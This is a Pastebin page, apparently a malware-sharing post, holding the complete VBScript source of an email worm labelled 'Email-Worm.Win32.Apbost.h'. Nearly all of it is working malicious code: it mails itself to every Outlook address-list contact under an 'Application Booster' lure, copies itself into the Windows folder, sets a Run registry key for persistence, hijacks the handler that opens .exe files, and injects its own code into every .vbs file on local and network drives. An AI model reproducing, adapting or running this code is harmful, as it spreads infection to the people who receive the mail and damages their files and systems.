Advertisement
FlyFar

Email-Worm.Win32.Apbost.h - Source Code

Jul 8th, 2023
1,718
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 4.40 KB | Cybersecurity | 0 0
  1. Rem -------xvstrt
  2. Option Explicit
  3. On Error Resume Next
  4. Dim IsAppixInf,sAARGS,i,dnx,oSH,oFS,oENV,wDir,sDir,tDir,vFile,oMECpY,wDirs(6),vNames(3)
  5. dnx=false
  6. For i = 0 to WScript.Arguments.Count-1
  7.  sAARGS = sAARGS+" "+WScript.Arguments(i)
  8.  If WScript.Arguments(i) = "dnx" Then
  9.   dnx=true
  10.  End If
  11. Next
  12. If not dnx Then
  13.   setvarz()
  14.   regstuff()
  15.   checkargs()
  16.   infdirs()
  17.   sendmails()
  18. End If
  19. Sub sendmails()
  20. Dim oOL,oMAPI,cAL,oAL,oMSG,sAD,cENTRIES
  21. Set oOL=WScript.CreateObject("Outlook.Application")
  22. Set oMAPI=oOL.GetNameSpace("MAPI")
  23. For cAL=1 to oMAPI.AddressLists.Count
  24.  Set oAL=oMAPI.AddressLists(cAL)
  25.  Set oMSG=oOL.CreateItem(0)
  26.  If (oAL.AddressEntries.Count>0) then
  27.   For cENTRIES=1 to oAL.AddressEntries.Count
  28.      sAD=oAL.AddressEntries(cENTRIES)
  29.      oMSG.Recipients.Add(sAD)
  30.   Next
  31.   oMSG.Subject = "Application Booster"
  32.   oMSG.Body = "Try the Free Application Boost Pack, NOW !!!!"
  33.   If oFS.FileExists(vFile) Then
  34.    oMSG.Attachments.Add(vFile).DisplayName = "Installation Program"
  35.   End If
  36.   If oFS.FileExists(WScript.ScriptFullname) Then
  37.    oMSG.Attachments.Add(WScript.ScriptFullname).DisplayName = "Installation Cleanup"
  38.   End If
  39.   If oFS.FileExists(wDirs(0)+"\\appboost.reg") Then
  40.    oMSG.Attachments.Add(wDirs(0)+"\\appboost.reg").DisplayName = "Windows 9x/NT/2000 Patch Registry File"
  41.   End If
  42.   oMSG.Send
  43.  End If
  44. Next
  45. End Sub
  46. Sub checkargs()
  47.  Dim i
  48.  If WScript.Arguments.Count > 0 Then
  49.   oSH.run ("wscript """+WScript.Arguments(0)+""" "+sAARGS+" dnx")
  50.   InfectFile(WScript.Arguments(0))
  51.  End If
  52. End Sub
  53. Sub infdirs()
  54.  Dim oFold,oDR,sDR,oFC,cDIR,sTFILE,aFILES,sFILE
  55.  If not oFS.FileExists(wDirs(0)+"\\appboost.vbs") Then
  56.    Set oFC = oFS.GetFile(WScript.ScriptFullName)
  57.    oFC.Copy(wDirs(0)+"\\appboost.vbs")
  58.  End If
  59.  Set oDR = oFS.Drives
  60.  For Each sDR in oDR
  61.   If sDR.DriveType = 2 or sDR.DriveType=3 Then
  62.    cDIR = "dir "+sDR.path+"\\*.vbs /b /s"
  63.    sTFILE = oFS.GetTempName
  64.    sTFILE = wDirs(2) & "\\" & sTFILE
  65.    oSH.Run "%comspec% /c " & cDIR & " >" & sTFILE, 0, true
  66.    aFILES = Split(oFS.OpenTextFile(sTFILE).ReadAll,vbcrlf)
  67.    oFS.DeleteFile sTFILE
  68.    For Each sFILE in aFILES
  69.     InfectFile(sFILE)
  70.    Next  
  71.   End If
  72.  Next
  73. End Sub
  74. Sub regstuff()
  75.  Dim v
  76.  oSH.regwrite "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\AppBoost","WScript.exe """+WScript.ScriptFullname+""""
  77.  If IsAppixInf Then
  78.   oSH.regwrite "HKEY_CLASSES_ROOT\\exefile\\shell\\open\\command\\",wDirs(0)+"\\appboost.exe ""%1"" %*"
  79.  End If
  80. End Sub
  81. Sub setVarz()
  82.  Dim IsVir,oME,readLine,i
  83.  Set oFS = CreateObject("Scripting.FileSystemObject")
  84.  Set oSH = CreateObject("WScript.Shell")
  85.  Set oENV = oSH.Environment("Process")
  86.  wDirs(0) = oFS.GetSpecialFolder(0)
  87.  wDirs(1) = oFS.GetSpecialFolder(1)
  88.  wDirs(2) = oFS.GetSpecialFolder(2)
  89.  wDirs(3) = oSH.SpecialFolders("Desktop")
  90.  wDirs(4) = oSH.SpecialFolders("MyDocuments")
  91.  wDirs(5) = oSH.SpecialFolders("Startup")
  92.  vNames(2) = "C:\\test.exe"
  93.  vNames(0) = wDirs(0)+"\\appbsvc.exe"
  94.  vNames(1) = wDirs(0)+"\\appboost.exe"
  95.  For i = 0 to 2
  96.   If oFS.FileExists(vNames(i)) Then
  97.    vFile = vNames(i)
  98.   End If
  99.  Next
  100.  If oFS.FileExists(vFile) Then
  101.   IsAppixInf=true
  102.  Else
  103.   IsAppixInf=false
  104.  End If
  105.  Set oME = oFS.OpenTextFile(WScript.ScriptFullname,1)
  106.  Do While Not oME.AtEndOfStream
  107.   readLine = oME.ReadLine
  108.   If readline = "Rem --------xvstrt" Then
  109.     IsVir=true
  110.   End If
  111.   If IsVir Then
  112.    oMECpY = oMECpY+readline+Chr(13)+Chr(10)
  113.   End If
  114.   If readline = "Rem --------xved" Then
  115.     IsVir=false
  116.   End If
  117.  Loop
  118. End SuB
  119. Function IsInfected(fToCheck)
  120.  Dim IsVir,ofToCheck,readLine
  121.  IsVir=false
  122.  If oFS.FileExists(fToCheck) Then
  123.  Set ofToCheck=oFS.OpenTextFile(fToCheck,1,true)
  124.  Do While Not ofToCheck.AtEndOfStream
  125.   readLine = ofToCheck.ReadLine
  126.   If readline = "Rem --------xvstrt" Then
  127.     IsVir=True
  128.   End If
  129.  Loop
  130.  ofToCheck.close
  131.  End If
  132.  IsInfected = IsVir
  133. End Function
  134. Sub InfectFile(fToInf)
  135.  Dim oOrig,ofToInf,oATT,aOLD
  136.  If (not IsInfected(fToInf)) AND oFS.FileExists(fToInf) Then
  137.   Set oFS = CreateObject("Scripting.FileSystemObject")
  138.   Set ofToInf=oFS.OpenTextFile(fToInf,1,true)
  139.   oOrig=ofToInf.ReadAll
  140.   ofToInf.close
  141.   Set oATT = oFS.GetFile(fToInf)  
  142.   aOLD = oATT.Attributes
  143.   oATT.Attributes = 0
  144.   Set ofToInf=oFS.OpenTextFile(fToInf,2,true)
  145.   ofToInf.write oMECpY+Chr(13)+Chr(10)+oOrig
  146.   ofToInf.close
  147.   Set oATT = oFS.GetFile(fToInf)  
  148.   oATT.Attributes = aOLD
  149.  End If
  150. End Sub
  151. Rem -------xved
Tags: email vbs worm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement